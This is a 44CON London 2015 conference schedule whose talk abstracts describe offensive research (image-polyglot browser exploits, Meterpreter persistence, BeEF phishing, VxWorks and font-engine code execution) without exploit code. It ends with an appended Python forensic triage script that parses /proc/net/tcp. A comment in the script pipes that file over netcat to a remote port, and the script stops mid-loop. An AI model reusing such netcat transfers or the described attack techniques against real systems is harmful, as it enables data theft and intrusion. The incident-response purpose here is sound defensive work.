44CON LONDON 2015 has ended
Wednesday, September 9
 

18:00 BST

Registration opens
44CON LONDON 2015 opens with the Community Evening. Free to attend (registration required); we have talks and a film!

Wednesday September 9, 2015 18:00 - 18:29 BST
Track 2

18:30 BST

44CON LONDON 2015 Community Evening Opening
44CON LONDON 2015 opens with the Community Evening. Free to attend (registration required); we have talks and a film!

Speakers
adrian
Event Director, 44CON, SINCON, alien8 Security

Wednesday September 9, 2015 18:30 - 18:44 BST
Track 1

18:45 BST

Stegosploit - Drive-by Browser Exploits using only Images
"A good exploit is one that is delivered with style".

Stegosploit creates a new way to encode "drive-by" browser exploits and deliver them through image files. These payloads are undetectable using current means. This paper discusses two broad underlying techniques used for image-based exploit delivery: steganography and polyglots. Drive-by browser exploits are steganographically encoded into JPG and PNG images. The resultant image file is fused with HTML and JavaScript decoder code, turning it into an HTML+Image polyglot. The polyglot looks and feels like an image, but is decoded and triggered in a victim's browser when loaded.

Speakers
Saumil Shah
Saumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients around the globe. Saumil is an internationally recognized speaker and instructor, having regularly presented at conferences like 44CON, Blackhat, RSA, CanSecWest...

Wednesday September 9, 2015 18:45 - 19:44 BST
Track 1

19:45 BST

Get in the Ring0 - Understanding Windows drivers
Separate your IRPs from your IRQLs, people, it's time to learn about Windows drivers. Turns out they're not magic. Who knew?

Speakers
Graham Sutherland
Penetration Tester, Portcullis Computer Security
Graham Sutherland is a penetration tester working for Portcullis Computer Security in London. Before making the career move to security, he spent several years paying his dues as a developer. He is primarily self-taught and spent the best part of a decade doing independent security...

Wednesday September 9, 2015 19:45 - 20:44 BST
Track 1

19:45 BST

How to drive a malware analyst crazy
This talk will discuss the different methods malware authors use to complicate malware forensics and reverse engineering. It will cover both the history of anti-forensics and what is being used today.

Speakers
Michael Boman
Pensionsmyndigheten
Michael is a malware researcher, developer, speaker and founder of Malware Research Institute, an organisation that promotes and develops tools, techniques and procedures for malware research, malware forensics and incident response. Michael's interest in malware began when his...

Wednesday September 9, 2015 19:45 - 20:44 BST
Workshop

22:00 BST

Film: Hackers
Wednesday September 9, 2015 22:00 - 23:59 BST
Track 2
 
Thursday, September 10
 

08:30 BST

Registration opens
44CON LONDON 2015 opens for registration

Thursday September 10, 2015 08:30 - 09:14 BST
Track 2

09:15 BST

44CON LONDON 2015 Opening
Speakers
adrian
Event Director, 44CON, SINCON, alien8 Security

Thursday September 10, 2015 09:15 - 09:29 BST
Track 1

09:30 BST

Smart Muttering; a story and toolset for smart meter platform
The use of smart meters and their associated technologies is becoming more widespread as utility providers struggle to deal with ever-growing demand and scarcer resources. The European Union has deployed over 46 million smart meters to date, with an additional 119 million smart meters intended to be deployed in member countries by 2019. Likewise, in the United States of America, there are indications that the number of smart meters deployed had topped the 50 million mark in mid-July 2014.

Previous work has shown security and privacy concerns with smart metering specifically, with researchers at IOActive even developing a "Smart Grid Worm". However, this work has done little to open either smart meter research to a wider audience, or provide tools for approaching new platforms and devices.

To address this, we developed a pluggable framework and an easy-to-build, low-cost hardware platform for embedded device protocol analysis and manipulation, both of which will be released under an open-source license during the talk.

Whilst smart devices have been developed for managing resources, their functionality has also been found to be applicable to other spheres, resulting in technologies (based on, or similar to smart technologies) often being found in other applications. Some smart device platforms are also used in process management applications, and even transport management systems. The resources governed by these systems are regarded as critical infrastructure by most governments. Disruption of these systems could result in significant damage to national infrastructure – or even political instability in a region targeted by attackers. In addition to smart networks, the advent of the so-called "Internet of Things", has added a plethora of new devices to home networks. Thus these technologies are responsible for securing access to both nation-state as well as residential resources, making research in this area an important concern.

Given the present and growing criticality of these devices, we embarked on a lengthy assessment of the popular LonMark platform as implemented in the Echelon Series 5000-based devices with the aim of discovering platform-wide vulnerabilities that could be used to attack devices or their backend management platforms.

However, few to no tools exist for assessing devices that make use of obscure networks or protocols. Currently, attacking smart meters, interconnected hardware and associated applications is not as simple as firing up a web proxy and intercepting traffic, as is the case with web applications; that is something this talk hopes to change. In most cases, the devices communicate over mediums researchers may not be familiar with and may use custom protocols, making it difficult to obtain access to network communication streams.

To counter these obstacles, I will present various mechanisms for assessing the security of obscure networks, protocols and devices. This will be performed using off-the-shelf hardware and a custom framework for conducting this type of work.

This toolset, the result of thousands of hours' worth of research, will provide functionality for conducting traditional sniffing, replay and fuzzing attacks against devices making use of wired connections. Using this framework, the analyst will practically demonstrate attacks against the smart devices used during the course of this research.

Previously, we have demonstrated vulnerabilities in Z-Wave home automation and security devices at BlackHat [1], as well as building proxy frameworks for obscure protocols such as SAP DIAG that led to a significant opening up of the protocol for further research [2]. Thus this work, while on a different platform, is a natural extension of past expertise and interests.

Speakers
Ian de Villiers
Ian de Villiers is a security analyst and researcher at SensePost. Coming from a development background, his areas of expertise are in application and web application assessments. Ian has spent considerable time researching application frameworks, and has published a number of...

Thursday September 10, 2015 09:30 - 10:29 BST
Track 1

09:30 BST

Attacking VxWorks: from Stone Age to Interstellar
VxWorks is the world's most widely used real-time operating system deployed in embedded systems. Its market reach spans all safety-critical fields, including the Mars Curiosity rover, the Boeing 787 Dreamliner and network routers, to name a few. The safety-critical nature of these applications makes VxWorks security a major concern.

Our team has conducted a thorough security analysis of VxWorks, including its supported network protocols and OS security mechanisms. We will present the tool we developed for VxWorks assessment. The main goal of our tool is to provide effective penetration testing by implementing the WdbRPC protocol in Python. To show its effectiveness, we are going to reveal some of the bugs we discovered along the way.

Finally, we will wrap up by demonstrating the vulnerability we found that allows remote code execution on most VxWorks based devices. A quick Internet scan shows that at least 100k devices running VxWorks are connected to the Internet. Considering the popularity of VxWorks in the age of IoT, this issue will have a widespread impact.

Speakers
Yannick Formaggio
Yannick is a passionate French IT security researcher at Istuary Innovation Group. He graduated from Bordeaux 1 University (France) with a master of science in Cryptography and IT Security in 2010. He worked 4 years as a subcontracting IT Security consultant for Airbus and Thales...

Thursday September 10, 2015 09:30 - 10:29 BST
Track 2

10:30 BST

Break
Thursday September 10, 2015 10:30 - 10:59 BST
Track 2

10:30 BST

Introduction to Reverse Engineering C++
C++ and Object-Oriented Programming (OOP) have been around for a while. Software (from small to large-scale projects) and malware are leveraging C++ and OOP more and more. Understanding how to program in and reverse engineer C++ can aid in finding or exploiting vulnerabilities, performing in-depth analysis of malware, hacking games, etc.

In this workshop we will discuss
  • C++ Overview: Builds a foundation of C++-isms to ensure everyone understands the basic concepts we will discuss during the workshop. Some C++ topics that will be covered: class keyword, scope operator (::), public/private/protected keywords, constructor/destructor, getter/setter methods, this keyword, etc.
  • Polymorphism: What is polymorphism and what it adds to C++ programming that cannot be accomplished in a C application
  • Class Relationships and Binding Types: Highlights three different class relationships (containment, association, and inheritance) and how binding types (compile vs run time) affect the assembly generated by the compiler
  • Reversing Strategies: Developing a methodology for reverse engineering C++ object oriented programs with IDA Pro by leveraging structures and applying them to the disassembly. All previously discussed topics will be revisited at the assembly level.

This workshop requires attendees to:
  • Understand C and x86 Assembly
  • Have a Windows XP or higher VM
  • Have a free, licensed, or demo version of IDA Pro
  • Have a version of Microsoft's Visual Studio

Speakers
Angel Villega
Angel doesn't like writing about himself... Angel is a Research Engineer within the Talos Security Intelligence and Research Group at Cisco. He is based in Maryland, USA. In this role he conducts in-depth analysis of malware, vulnerability research, and develops software.

Thursday September 10, 2015 10:30 - 12:29 BST
Workshop

11:00 BST

Is there an EFI monster inside your apple?
A few weeks ago I publicly disclosed an Apple EFI firmware zero-day.
It was a very powerful bug allowing direct access to the EFI firmware from the operating system. EFI rootkits are some of the most powerful and most interesting rootkits. Because they work at a very low level, they can play a lot of tricks to hide themselves from forensics and persist for a long time.

EFI monsters are a bit like jaguars: stealthy and rarely seen by humans. This doesn't mean they do not exist. EFI monsters are most certainly part of spy agencies' rootkit catalogs.
Very few tools exist to chase them.

This talk is about introducing you to the EFI world so you can also start to chase these monsters. The EFI world might look scary, but it's a bit easier than you think and a lot of fun.

Reference blogpost:
https://reverse.put.as/2015/07/01/reversing-prince-harmings-kiss-of-death/

Plus content about the EFI layout, where to look for rootkits, and so on.
Essentially an introduction to EFI and how to find potential rootkits there.

Speakers
Pedro Vilaça
A leading expert in the field of not being an expert, plays with computers for more than 30 years, holds a degree in Economics and a MBA, writes a somewhat famous OS X related blog, breaks copy protections for fun and profit, annoys HackingTeam, trolls Apple's product security policy...

Thursday September 10, 2015 11:00 - 11:59 BST
Track 1

11:00 BST

Meterpreter: Understanding the New Shiny
The last couple of years have seen Meterpreter move forward leaps and bounds when it comes to new features and stability. Metasploit users worldwide continue to make use of it for its core feature set that is already well known, but are yet to benefit from the new features that are starting to make it a more compelling tool for red team engagements.

The goal of this talk will be to bring people up to speed on how Meterpreter has changed, evolved and become what it is in 2015. Old features will be covered, and new features will be discussed in depth, with a focus on how those new features can be used to help red teamers establish and maintain a stronger foothold in their target's network.

This presentation will not only discuss the features at a high level, but will also dive deeper into some of the more technical details around the new and more interesting features, including stageless payloads, transport modification, paranoid mode, and persistence. It will also cover some of the common pitfalls that cause shells to fail, and how to avoid them.

It may even include a sneak peek of what's to come further down the track!

Speakers
OJ Reeves
Founder, Beyond Binary
OJ Reeves is an Australian security professional who specialises in attack simulation. When not breaking networks and software he is actively contributing to the Metasploit framework, with a particular focus on Meterpreter.

Thursday September 10, 2015 11:00 - 11:59 BST
Track 2

12:00 BST

Lunch
Thursday September 10, 2015 12:00 - 13:29 BST
Track 1

12:30 BST

Lunch
Thursday September 10, 2015 12:30 - 13:29 BST
Workshop

13:30 BST

DDoS mitigation EPIC FAIL collection
I have been researching DDoS attacks and mitigation techniques for the past three years and have worked with industry leaders on testing their systems, providing them with cutting-edge, and even never-seen-before, attacks.
I was amazed (actually, still am) to find out that those big corporations, investing much work into their defense architecture, came to FAIL, and sometimes the sole reason for a successful attack was a mitigation configuration or architecture FAIL.
My research is done by utilizing smart grids of computers mimicking vast botnets from all over the world, writing and perfecting scripted attacks, and even involving social engineering attempts within those attacks (for mitigation that involves manual intervention).
The presentation will showcase 10 such FAILs, each detailed technically with a step-by-step walkthrough of the attack strategy and how its mitigation failed, and of course a recommended setup for a proper mitigation technique that will not suffer the kind of direct damage presented.

Speakers
Moshe Zioni
Moshe (dalmoz) has been researching security since he was 14, and realized around the age of 20 that there is a market for hackers, now called pentesters, and that people will actually pay you for your "service". Nowadays he consults for industry leaders, banks, software vendors...

Thursday September 10, 2015 13:30 - 14:29 BST
Track 1

13:30 BST

Old Dog, New Tricks: Forensics With PowerShell
Recent intrusions into the networks of organizations like the Office of Personnel Management, Sony, JPMorgan Chase, and British Airways have shown that the question isn't "if" your organization will be targeted, but "when". With these attacks and many others in recent years, incident response teams have had to rapidly change tactics from the "image-and-forget" methodology to live-box forensics and containment. During these engagements, forensic analysts must actively track and monitor an adversary in their network while preventing the adversary from recognizing detection, but most tools are not up to the job. PowerShell brings defenders the flexibility and in-memory nature needed to tackle live threats.

In this talk, I will cover how my project, PowerForensics, can provide the Digital Forensics/Incident Response community with an all in one toolset for attack response and investigation. By leveraging PowerShell’s access to the Windows API and .NET framework, PowerForensics provides investigators with a forensically sound “live” investigation platform without the need to image the hard drive. I’ll cover the background and overview of PowerForensics, including how its various capabilities can facilitate the investigation of advanced actors at scale. Finally, I’ll cap off with a complex demo, showing how PowerForensics can help blue teams investigate the real attacks they’re now facing. PowerShell isn’t just for the red team anymore.

Speakers
Jared Atkinson
Jared Atkinson is the Hunt Capability Lead with Veris Group's Adaptive Threat Division and is an Adjunct Lecturer in Utica College's M.S. in Cybersecurity program. Before working for Veris Group, Jared spent 4 years leading incident response missions for the U.S. Air Force...

Thursday September 10, 2015 13:30 - 14:29 BST
Track 2

13:30 BST

Analyzing Malicious Office Documents
In this workshop (2 hours), I explain how to use the tools (oledump, emldump, YARA rules, ...) I developed to analyze (malicious) Microsoft Office documents.
I have around 20 exercises that explain step by step to the workshop participants how they can analyze malicious Office documents with my Python tools. Microsoft Office is not required for the analysis.

Speakers
Didier Stevens
Didier Stevens (Microsoft MVP Consumer Security, SANS ISC Handler, Wireshark Certified Network Analyst, ...) is a Senior Analyst working at NVISO (https://www.nviso.be). Didier has developed and published more than 100 tools, several of them popular in the security community. You...

Thursday September 10, 2015 13:30 - 15:29 BST
Workshop

14:30 BST

reverse reverse engineering
Note: This talk will not be recorded.
Richo will walk attendees through the basic architecture of a traditional AOT compiler and runtime loader, and describe the parallels between this and the operation of a modern bytecode VM (python, ruby, etc). With this newfound knowledge, we'll tackle implementing a tool to reverse engineer a sample of obfuscated ruby. However, instead of analyzing the bytecode directly, we will instead implement a malicious, but otherwise fully functional VM, and use that to explore the various anti-analysis tricks deployed.

By the end of the talk, you will have extended insight into the conceptual inner workings of a compiler, and feel equipped to implement substitutes for the interesting parts of a traditional compilation/loader pipeline to trick opaque objects into telling you how they work, instead of the other way around. While the demos will focus on ruby, the techniques demonstrated are equally applicable to python, etc.

Speakers
richö butts
Security Engineer, Stripe
richö spends most of his time flying parachutes and flinging himself off things. But he also hacks computers and hangs out with nerds.

Thursday September 10, 2015 14:30 - 15:29 BST
Track 1

14:30 BST

Dark Fairytales from a Phisherman (Vol.II)
Phishing attacks are a prevalent threat against large or small organisations. As professionals in the security field we need to be able to give our clients the look and feel of what a real "bad guy" may do to attack an organisation.

Leverage Phishing Frenzy and BeEF on your next engagement to ensure your client is getting the most out of their assessment. With simple templates you can launch an effective phishing campaign in minutes, and thanks to the BeEF integration you’ll be hooking and exploiting browsers in no time.

Have you ever wondered what is the best pretext to use during your phishing campaign use-case? What about timeframes? We’ll discuss statistics based on real-world professional phishing engagements. We'll also entertain you with fun (and real) hacking stories involving phishing and client-side exploitation.

Expect some new code to be released during this talk:
  • Phishing Frenzy and BeEF seamless integration (including geo location services, visual map representation, and browser finger-printing);
  • A solid BeEF autorun engine based on exploitation templates;
  • Exploit automation of common enterprise scenarios like Outlook Web Access, Citrix, HTA attacks and others.

With such an open source Swiss army knife in your tool-bag you can finally enjoy your coffee while waiting for credentials and shells.

Speakers
Michele Orru
antisnatchor – Michele is the lead core developer and smart-minds-recruiter for the BeEF project. Michele is also the co-author of the "Browser Hacker's Handbook." He has a deep knowledge of programming in multiple languages and paradigms, and is excited to apply this knowledge...

Thursday September 10, 2015 14:30 - 15:29 BST
Track 2

15:30 BST

44CON LONDON 2015 afternoon tea
Thursday September 10, 2015 15:30 - 15:59 BST
Track 2

16:00 BST

Inside Terracotta VPN
Virtual Private Networks (VPNs) are very popular. They are part and parcel of almost every enterprise network, especially those with remote employees. Aside from VPNs for enterprises, there are many reputable commercial VPN services that offer low-cost, reliable service to individual users. These users employ VPNs for reasons that might include connection security, protection of private data, online gaming acceleration, and bypassing service provider restrictions. VPNs are also popular with cyber criminals, as they are one way the latter can obscure their true source location. When a commercial VPN service provider uses resources such as servers and copious bandwidth stolen or repurposed from unsuspecting victims for purposes of profit, the offering clearly crosses into the criminal domain. In this report, FirstWatch exposes one such operator doing business under multiple VPN brand names out of the People's Republic of China (PRC). At last count, the Terracotta VPN node ecosystem consisted of more than 1500 systems around the globe. Every Windows server running as a Terracotta VPN node that FirstWatch was able to verify was hacked.

The operators behind Terracotta VPN continue their broad campaign to compromise multiple victim organizations around the world. Meanwhile, advanced threat actors such as Shell_Crew (Google RSA Shell_Crew for details) use Terracotta VPN to anonymize their activity while they hack the crap out of governments and commercial entities around the world. While RSA has yet to release the paper to the public, an earlier version of Inside Terracotta VPN was presented to Microsoft’s invitation-only Digital Crimes Consortium (DCC 2105) conference in Miami. This presenter will share with the 44CON London audience otherwise non-public information previously restricted to law enforcement on how this was discovered, and other stuff not appearing in the paper to be released by RSA (this summer).

Speakers
Kent Backman
Kent is a threat intelligence analyst with FirstWatch, the threat intelligence group behind RSA's threat intelligence-driven products including RSA Security Analytics, formerly Netwitness. FirstWatch typically tracks things with no name. Within the small FirstWatch group, Kent's...

Thursday September 10, 2015 16:00 - 16:59 BST
Track 1

16:00 BST

A Trek to the Emerald City: Ring -1 Based AV
To compete in the endless race against rootkits, antivirus software vendors are slowly starting to use the Virtualization Extensions offered by commodity CPUs.

The attack surface of AV software has been large enough until now, but hypervisor-based AV solutions expose a whole new attack surface. By exploiting flaws in AV software, instead of Ring 0 control or full Administrator privileges, it is now possible to gain Ring -1 permissions, an almost jackpot-like ring which allows controlling the Virtualization Extensions our CPUs employ.

This talk takes us into the realm of hypervisor-based AVs, to see how well they've managed to walk in the depths of Ring -1 in their attempts to implement a thin hypervisor layer to help in the fight against rootkits.

Why

I worked on a couple of hypervisor-based AVs and found interesting attack surface points in there. I think that nowadays, although most of us are using AVs, we're not even aware of the insecurity they're providing.

Other than that, the whole hype around "VMM" or "Ring -1" makes it even more fun; there are not many people around the globe who audit VMM code, mostly because people are afraid of those fancy words like Extended Page Tables, VM Exits and, mainly, memory handling.

In this presentation I'll try to remove this fear. I'll show the basic architecture of a VM-based AV, how it communicates with the outside world (e.g. user mode) and how it might be possible to abuse it in order to gain code execution and system control.

Speakers
Shift
Shift is a Freelance Security Researcher interested in the fields of Computer Security.

Thursday September 10, 2015 16:00 - 16:59 BST
Track 2

16:00 BST

Indicators of Compromise: From malware analysis to eradication
This workshop takes you through the steps from locating an unknown malware sample inside the corporate network, to analyzing the sample to identify the indicators of compromise, to using those indicators to eradicate the malware from the enterprise network with freely available tools, some of which you might already have deployed.

Speakers
Michael Boman
Pensionsmyndigheten
Michael is a malware researcher, developer, speaker and founder of Malware Research Institute, an organisation that promotes and develops tools, techniques and procedures for malware research, malware forensics and incident response. Michael's interest in malware began when his...

Thursday September 10, 2015 16:00 - 17:59 BST
Workshop

17:00 BST

Barbarians At The Gate(way): An Examination Of The Attacker's Tool Box
This talk will examine the tools, methods and data behind the DDoS attacks that are prevalent in the news headlines. Using information collected, the presentation will demonstrate what the attackers are using to cause their mischief & mayhem, and examine the timeline and progression of attackers as they move from the historical page defacers to the motivated DDoS attacker.

We will look at the motivations and rationale that these attackers have, and try to share some understanding of what patterns the audience should be aware of for their own protection.

Speakers
Dave Lewis
Akamai Technologies
Dave has almost two decades of industry experience. He has extensive experience in IT operations and management. Currently, Dave is a Global Security Advocate for Akamai Technologies. He is the founder of the security site Liquidmatrix Security Digest and co-host of the Liquidmatrix...

Thursday September 10, 2015 17:00 - 17:59 BST
Track 1

17:00 BST

Reverse engineering and exploiting font rasterizers: the OpenType saga
Font rasterization software is clearly among the most desirable attack vectors of all time, due to multiple reasons: the wide variety of font file formats, their significant structural and logical complexity, typical programming language of choice (C/C++), average age of the code, ease of exploit delivery and internal scripting capabilities provided by the most commonly used formats (TrueType and OpenType). As every modern widespread browser, document viewer and operating system is exposed to processing external, potentially untrusted fonts, this area of security has a long history of research. As a result, nearly every major vendor releases font-related security advisories several times a year, yet we can still hear news about more 0-days floating in the wild.

Over the course of the last few months, we performed a detailed security audit of the implementation of OpenType font handling present in popular libraries, client-side applications and operating systems, which appears to have received much less attention in comparison to e.g. TrueType. During that time, we discovered a number of critical vulnerabilities, which could be used to achieve 100% reliable arbitrary code execution, bypassing all currently deployed exploit mitigations such as ASLR, DEP or SSP. More interestingly, a number of those vulnerabilities were found to be common across various products, enabling an attacker to create chains of exploits consisting of a very limited number of distinct security bugs.

The presentation will outline the current state of the art with regards to font security research, in the context of how the overall field of typography has evolved over the years, both back in the 80's and 90's and the more recent times, including the connections and ties between various font engines seen today. Following the enumeration of potential attack surfaces, we will discuss the process of reverse-engineering widespread proprietary OpenType/CFF implementations such as the Windows kernel ATMFD.DLL module (Adobe Type Manager Font Driver), and provide an in-depth analysis of the root cause and reliable exploitation process of vulnerabilities discovered in products such as Microsoft Windows, Adobe Reader, DirectWrite (Internet Explorer), FreeType and others.

Speakers
Mateusz Jurczyk
Mateusz is the vice-captain of the Dragon Sector CTF team and a big fan of memory corruption. His main areas of interest are client software security, vulnerability exploitation and mitigation techniques, and delving into the darkest corners of low-level kernel internals with a...

Thursday September 10, 2015 17:00 - 17:59 BST
Track 2

18:00 BST

44CON LONDON 2015 Gin O'Clock
Thursday September 10, 2015 18:00 - 18:59 BST
Workshop

19:00 BST

44CON LONDON 2015 Evening Session
All sorts of things going on to keep Attendees, Sponsors and Crew entertained.

Thursday September 10, 2015 19:00 - 19:34 BST
Workshop

19:35 BST

Exploiting 64-bit IE on Windows 8.1 - The Pwn2Own Case Study
Instead of 32-bit IE, this year's Pwn2Own competition selected 64-bit Internet Explorer as the target for the first time. 64-bit IE brings new challenges to exploit writers; for example, simple heap-spraying techniques will not work in a 64-bit process. And in order to win the game, we also needed to bypass the Control Flow Guard (CFG) mitigation on Windows 8.1 as well as the Enhanced Protected Mode (EPM) sandbox of IE.

In this presentation, we will disclose the details of the two vulnerabilities we used to take down 64-bit IE in Pwn2Own 2015 for the first time. We will go through the PoC exploit to demonstrate the techniques we used to build a working 64-bit IE exploit. We will show how we achieved ASLR and CFG bypass and remote code execution in 64-bit IE with a single uninitialized-memory bug. We will also discuss the bug we used to bypass IE's EPM sandbox to achieve elevation of privilege.

Speakers
Yuki Chen

Yuki Chen is a core member of the 360Vulcan Team from the 360 Safeguard offensive and defensive research group. In March this year, 360Vulcan Team successfully exploited 64-bit Internet Explorer with EPM enabled at Pwn2Own 2015 in Vancouver. Yuki Chen has 6+ years’ experience in security...


Thursday September 10, 2015 19:35 - 20:29 BST
Track 1

19:35 BST

Jtagsploitation: 5 wires, 5 ways to root
JTAG comes up in nearly every hardware-related hack. In order to do anything via JTAG, you generally need a hardware debugging device that connects to anything from a standard header to undocumented test points scattered around a device. JTAG access is almost always 'game over' but it's not always clear how to turn that hardware access into privileged software access on the system.
This talk will enumerate a number of different ways to turn a 'check' for JTAG access into the 'checkmate' of root shell access. Each example will demonstrate a unique method for getting root access via JTAG. Each method is also general enough to be broadly applicable across different hardware architectures and implementations. Example code and scripts will be released at the talk.

Speakers
Joe FitzPatrick

Joe FitzPatrick (@securelyfitz) has spent a decade working on low-level silicon debug, security validation, and penetration testing of CPUS, SOCs, and microcontrollers. He develops and delivers hardware security training at https://SecuringHardware.com, including Applied Physical Attacks on x86 Systems. In between, he keeps busy with contributions to the NSA Playset and other misdirected hardware projects, which he presents at all sorts of fun conferences...

Matt King

Matt is a hardware security researcher at a large semiconductor company.


Thursday September 10, 2015 19:35 - 20:29 BST
Track 2

19:35 BST

The IOT Evening Workshop
  • 101 logic probing
  • vulnerable device playing (scales, cameras, routers & things)
  • 102 firmware analysis + extraction
  • mobile app decompilation

Thursday September 10, 2015 19:35 - 22:59 BST
Workshop

20:30 BST

Playing with Fire: Attacking the FireEye MPS
Note: This talk will not be recorded.
This talk will give an overview of a number of vulnerabilities in FireEye's Malware Protection System (MPS) that were recently discovered (and which have since been patched). These range from command injections in the management web interface, over local privilege escalation vulnerabilities, to exploits that allow a full compromise of the system by simply sending a malicious file over the network and exploiting bugs in the analysis process.
We will discuss the inherent attack exposure of certain types of network security controls, together with architectural recommendations on how it could be addressed.

Speakers
Felix Wilhelm

Felix is a security researcher working for ERNW GmbH. His main interests are application security, reverse engineering and virtualization security. Felix has disclosed critical vulnerabilities in popular software such as Hyper-V, Xen, Typo3 or IBM GPFS and has presented his work...


Thursday September 10, 2015 20:30 - 21:29 BST
Track 1

20:30 BST

Film: Sneakers
Thursday September 10, 2015 20:30 - 22:29 BST
Track 2

21:30 BST

44CON LONDON 2015 Pub Quiz
Speakers
Jerry Gamblin

¯\_(ツ)_/¯, Kenna Security


Thursday September 10, 2015 21:30 - 22:29 BST
Track 1

22:30 BST

Hunted
Could you go on the run? Fourteen ordinary people on the run from a team of expert hunters. #Hunted: a real life thriller. And it's here.

Going off-grid is now a near impossible task. Our surveillance society catches us on CCTV up to seventy times a day, but the ever-watching eye can see much further than that.

Now everything from cash withdrawals to supermarket shopping, from telephone calls to social media posts are monitored. Our journeys are tracked, our locations are stored and our most personal of details sit on scores of anonymous databases. So is it ever possible to slip through the net in a surveillance nation?

But if you had to disappear tomorrow and become a fugitive, could you escape the tracks of your electronic footprint and head off grid? And just how would you go about it?

This summer, a group of ordinary Brits will go on the run. They will film their own adventures themselves as they take extreme measures to try to evade capture from our expert hunters. What they do and where they go will be up to them – but with a team of Hunters seeking them out and tracking them down, their task of going dark will be truly tested. 

Thursday September 10, 2015 22:30 - 23:30 BST
Track 1

22:30 BST

Film: Blade Runner - Director's Cut
Thursday September 10, 2015 22:30 - Friday September 11, 2015 00:59 BST
Track 2
 
Friday, September 11
 

01:00 BST

Bar open until late
Bar open until 4am (if enough demand)

Friday September 11, 2015 01:00 - 04:00 BST
Track 2

09:10 BST

44CON LONDON 2015 Day 2 Open
Friday September 11, 2015 09:10 - 09:29 BST
Track 2

09:30 BST

Software Defined Networking (SDN) Security
SDN is rapidly moving from R&D to production deployment, with some frightening security implications. This presentation will provide an overview of emerging SDN technologies, the attack surfaces they expose, and the kinds of vulnerabilities that have already been discovered in popular SDN controllers. A live demo of several exploits will show the potential security implications of deploying SDN in production today. Finally we will look at some efforts currently underway to improve the security of SDN controllers.

Speakers
David Jorm

David has been involved in the security industry for the last 15 years. During this time he has found high-impact and novel flaws in dozens of major Java components. He has worked for Red Hat's security team, led a Chinese startup that failed miserably, wrote the core aviation...


Friday September 11, 2015 09:30 - 10:29 BST
Track 1

09:30 BST

15-Minute Linux Incident Response Live Analysis
This presentation will show attendees how to perform an initial live analysis of a Linux system in mere minutes. The focus of the talk will be a set of shell scripts that allow an investigator to quickly make a determination as to whether or not an incident has occurred without the need to shut down the system to perform traditional dead analysis.

Within 15 minutes the investigator should have a rough idea of what has transpired and will be in a better position to determine if dead analysis is warranted. The shell scripts presented minimize the disturbance to the system and send all information to a forensics workstation over the network.

Nothing beyond basic Linux knowledge (user not administrator) is required of attendees. Attendees will leave with some tools for live analysis and also a good introduction to shell scripting for those that are new to this topic.


Speakers
Philip Polstra

Dr. Phil Polstra was born at an early age and has been programming since age 8 and hacking electronics since age 12. He is currently an Associate Professor teaching Digital Forensics and computer security at Bloomsburg University of Pennsylvania. He is no stranger to infosec conferences...


Friday September 11, 2015 09:30 - 10:29 BST
Track 2
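As an added illustration of the kind of triage the 15-Minute Linux Incident Response Live Analysis talk above describes (example code, not the speaker's scripts): the collection scripts ship raw files such as /proc/net/tcp to the forensics workstation, and the Python below, assumed to run on that workstation, turns the kernel's hex-encoded socket table into something an investigator can reason about in a minute. Reading /proc/net/tcp instead of trusting the suspect host's netstat or ss output sidesteps a replaced binary, and the inode column is the join key back to /proc/<pid>/fd on the host. The sample socket table, the allowlisted port set and the 10.0.0.5 / 203.0.113.9 addresses are constructed for the example.

```python
"""Workstation-side triage of a /proc/net/tcp copy shipped from a live Linux host.

Added example; not the talk's scripts. Assumes the collection script sent the
raw file verbatim (e.g. `cat /proc/net/tcp | nc workstation 4444`) and that the
suspect host is little-endian, which is how the kernel prints the addresses.
"""
import socket
import struct
from dataclasses import dataclass

# Socket states as the kernel numbers them in the `st` column.
TCP_STATES = {
    0x01: "ESTABLISHED", 0x02: "SYN_SENT", 0x03: "SYN_RECV", 0x04: "FIN_WAIT1",
    0x05: "FIN_WAIT2", 0x06: "TIME_WAIT", 0x07: "CLOSE", 0x08: "CLOSE_WAIT",
    0x09: "LAST_ACK", 0x0A: "LISTEN", 0x0B: "CLOSING",
}


@dataclass(frozen=True)
class TcpSocket:
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int
    state: str
    uid: int
    inode: int  # join key: `ls -l /proc/*/fd | grep socket:\[<inode>\]` on the host


def decode_addr(field: str):
    """'0100007F:0016' -> ('127.0.0.1', 22).

    The kernel prints the 32-bit address as stored in memory, so on a
    little-endian host the octets appear reversed; repacking as '<I' undoes that.
    """
    hex_ip, hex_port = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(hex_ip, 16)))
    return ip, int(hex_port, 16)


def parse_proc_net_tcp(text: str):
    """Parse the IPv4 table; columns: sl local remote st queues timers retrnsmt uid timeout inode ..."""
    rows = []
    for line in text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 10:
            continue
        lip, lport = decode_addr(fields[1])
        rip, rport = decode_addr(fields[2])
        state = TCP_STATES.get(int(fields[3], 16), fields[3])
        rows.append(TcpSocket(lip, lport, rip, rport, state, int(fields[7]), int(fields[9])))
    return rows


def listeners(rows):
    return [r for r in rows if r.state == "LISTEN"]


def established(rows):
    return [r for r in rows if r.state == "ESTABLISHED"]


def unexpected_listeners(rows, expected_ports):
    """Listening sockets outside the host's documented service set: bind shells, rogue proxies, etc."""
    return [r for r in listeners(rows) if r.local_port not in expected_ports]


def triage(text: str, expected_ports):
    rows = parse_proc_net_tcp(text)
    return {
        "listeners": listeners(rows),
        "established": established(rows),
        "unexpected": unexpected_listeners(rows, expected_ports),
    }


# Constructed sample: sshd on :22, something on :4444 owned by uid 33 (www-data
# on Debian) with a live connection from an external address.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 00000000:115C 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 99887 1 0000000000000000 100 0 0 10 0
   2: 0500000A:115C 097100CB:C822 01 00000000:00000000 00:00000000 00000000    33        0 99890 1 0000000000000000 20 4 30 10 -1
   3: 0500000A:0016 0200000A:C350 01 00000000:00000000 00:00000000 00000000     0        0 12400 1 0000000000000000 20 4 30 10 -1
"""


def demo():
    """Run the triage over the constructed sample with sshd as the only expected listener."""
    return triage(SAMPLE_PROC_NET_TCP, expected_ports={22})


if __name__ == "__main__":
    result = demo()
    for s in result["unexpected"]:
        print(f"UNEXPECTED LISTENER {s.local_ip}:{s.local_port} uid={s.uid} inode={s.inode}")
    for s in result["established"]:
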